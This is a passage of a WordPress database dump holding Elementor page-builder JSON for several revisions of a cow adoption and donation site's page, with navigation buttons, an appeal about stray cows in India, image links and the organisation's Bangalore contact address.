":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"772bd0e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gallery\",\"title_color\":\"#43693F\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fbf7c50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"<\\/p>\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c59178\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"29d5b45\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"},{\"id\":1354,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\"},{\"id\":1339,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/cows-farming-on-green-meadow-260nw-1704884002-e1663753177624.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"}],\"autoplay_speed\":1000},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ba24d1d\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"background_background\":\"slideshow\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/values.png\",\"id\":1654,\"alt\":\"\",\"source\":\"library\"},\"background_slideshow_gallery\":[{\"id\":1577,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK55.png\"},{\"id\":1544,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/gopalak-B1-copy.jpg\"}],\"padding\":{\"unit\":\"px\",\"top\":\"150\",\"right\":\"0\",\"bottom\":\"0150\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5007eb7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"c7f7d6b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"0\",\"bottom\":\"-10\",\"left\":\"-10\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" #800 Spandana towers\\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: namaste@gopalak.in\\n\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(11198,1865,'_elementor_page_assets','a:0:{}'),(11203,1868,'_elementor_edit_mode','builder'),(11204,1868,'_elementor_template_type','wp-page'),(11205,1868,'_elementor_version','3.7.8'),(11206,1868,'_wp_page_template','elementor_canvas'),(11207,1868,'_elementor_data','[{\"id\":\"1b3f952\",\"elType\":\"section\",\"settings\":{\"structure\":\"70\",\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"0135c90\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"22f7707\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/logo1211.png\",\"id\":1615,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"image_custom_dimension\":{\"width\":\"75\",\"height\":\"75\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"7ccac8b\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"4a5c3c2\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"14ed504\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"c17fb13\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"8bbe50b\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"80d9579\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"61d00ed\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"c8dec05\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"32d56b3\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/aboutus\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"921678d\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"75327ba\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e86e541\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"1605bf1\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"10265e7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Contribute-123.png\",\"id\":1725,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"4aab555\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>In India, cows wander on streets and there are hardly any people caring about them. They are left just as stray dogs where they roam on the roads, with some even bullied by the passers-by. Such cows are always hit by the people who seem it as fun to do so. Such cows need to be adopted or tamed by the locals in order to prevent them from the bullies or tortures they face. stress on these cows and requests people to join hands so that together we all can save our Gau Mata. It\\u2019s unfortunate to see that in India, where cows are worshipped as a Goddess, many people choose to ignore the conditions in which they are left to litter around and roam like just any other stray animal. Cows are valuable and it\\u2019s our duty to save this breed for it is only for our own benefit. We get milk by the cow which is, as we all know, necessary for our health. We need to preserve this rare species and for that it is necessary that people come forward to adopt them.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c479969\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"ad82ec2\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"61e999c\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[table id=1 \\/]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"117d94d\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"8a58209\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"0459073\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f01ff4f\",\"elType\":\"widget\",\"settings\":{\"title\":\" #800 Spandana towers\\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: namaste@gopalak.in\\n\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(11208,1868,'_elementor_page_assets','a:0:{}'),(11210,1869,'_elementor_edit_mode','builder'),(11211,1869,'_elementor_template_type','wp-page'),(11212,1869,'_elementor_version','3.7.8'),(11213,1869,'_wp_page_template','elementor_canvas'),(11214,1869,'_elementor_data','[{\"id\":\"1b3f952\",\"elType\":\"section\",\"settings\":{\"structure\":\"70\",\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"0135c90\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"22f7707\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/logo1211.png\",\"id\":1615,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"image_custom_dimension\":{\"width\":\"75\",\"height\":\"75\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"7ccac8b\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"4a5c3c2\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"14ed504\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"c17fb13\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"8bbe50b\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"80d9579\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"61d00ed\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"c8dec05\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"32d56b3\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/aboutus\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"921678d\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"75327ba\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e86e541\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"1605bf1\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"10265e7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Contribute-123.png\",\"id\":1725,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"4aab555\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>In India, cows wander on streets and there are hardly any people caring about them. They are left just as stray dogs where they roam on the roads, with some even bullied by the passers-by. Such cows are always hit by the people who seem it as fun to do so. Such cows need to be adopted or tamed by the locals in order to prevent them from the bullies or tortures they face. stress on these cows and requests people to join hands so that together we all can save our Gau Mata. It\\u2019s unfortunate to see that in India, where cows are worshipped as a Goddess, many people choose to ignore the conditions in which they are left to litter around and roam like just any other stray animal. Cows are valuable and it\\u2019s our duty to save this breed for it is only for our own benefit. We get milk by the cow which is, as we all know, necessary for our health. We need to preserve this rare species and for that it is necessary that people come forward to adopt them.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c479969\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"ad82ec2\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"61e999c\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[table id=1 \\/]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"117d94d\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"8a58209\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"0459073\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f01ff4f\",\"elType\":\"widget\",\"settings\":{\"title\":\" #800 Spandana towers\\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: namaste@gopalak.in\\n\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(11215,1869,'_elementor_page_assets','a:0:{}'),(11217,1870,'_elementor_edit_mode','builder'),(11218,1870,'_elementor_template_type','wp-page'),(11219,1870,'_elementor_version','3.7.8'),(11220,1870,'_wp_page_template','elementor_canvas'),(11221,1870,'_elementor_data','[{\"id\":\"1b3f952\",\"elType\":\"section\",\"settings\":{\"structure\":\"70\",\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"0135c90\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"22f7707\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/logo1211.png\",\"id\":1615,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"image_custom_dimension\":{\"width\":\"75\",\"height\":\"75\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"7ccac8b\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"4a5c3c2\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"14ed504\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"c17fb13\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"8bbe50b\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"80d9579\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"61d00ed\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"c8dec05\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"32d56b3\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/aboutus\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"921678d\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"75327ba\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e86e541\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"1605bf1\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"10265e7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Contribute-123.png\",\"id\":1725,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"4aab555\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>In India, cows wander on streets and there are hardly any people caring about them. They are left just as stray dogs where they roam on the roads, with some even bullied by the passers-by. Such cows are always hit by the people who seem it as fun to do so. Such cows need to be adopted or tamed by the locals in order to prevent them from the bullies or tortures they face. stress on these cows and requests people to join hands so that together we all can save our Gau Mata. It\\u2019s unfortunate to see that in India, where cows are worshipped as a Goddess, many people choose to ignore the conditions in which they are left to litter around and roam like just any other stray animal. Cows are valuable and it\\u2019s our duty to save this breed for it is only for our own benefit. We get milk by the cow which is, as we all know, necessary for our health. We need to preserve this rare species and for that it is necessary that people come forward to adopt them.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c479969\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"ad82ec2\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"61e999c\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[table id=1 \\/]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"117d94d\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"8a58209\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"0459073\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f01ff4f\",\"elType\":\"widget\",\"settings\":{\"title\":\" #800 Spandana towers\\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: namaste@gopalak.in\\n\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(11222,1870,'_elementor_page_assets','a:0:{}'),(11225,1871,'_elementor_edit_mode','builder'),(11226,1871,'_elementor_template_type','wp-page'),(11227,1871,'_elementor_version','3.7.8'),(11228,1871,'_wp_page_template','elementor_canvas'),(11229,1871,'_elementor_data','[{\"id\":\"bd48cf8\",\"elType\":\"section\",\"settings\":{\"structure\":\"70\",\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"a54ffbe\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"13df1e1\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/logo1211.png\",\"id\":1615,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"image_custom_dimension\":{\"width\":\"75\",\"height\":\"75\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"e9cb50b\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"3e6d778\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"8b2632b\",\"elType\":\"widget\",\"settings\":{\"t